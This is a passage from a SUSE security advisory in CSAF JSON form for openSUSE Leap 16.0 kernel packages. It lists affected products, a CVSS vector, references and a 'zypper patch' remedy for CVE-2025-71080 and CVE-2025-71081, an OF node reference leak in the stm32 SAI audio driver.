"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
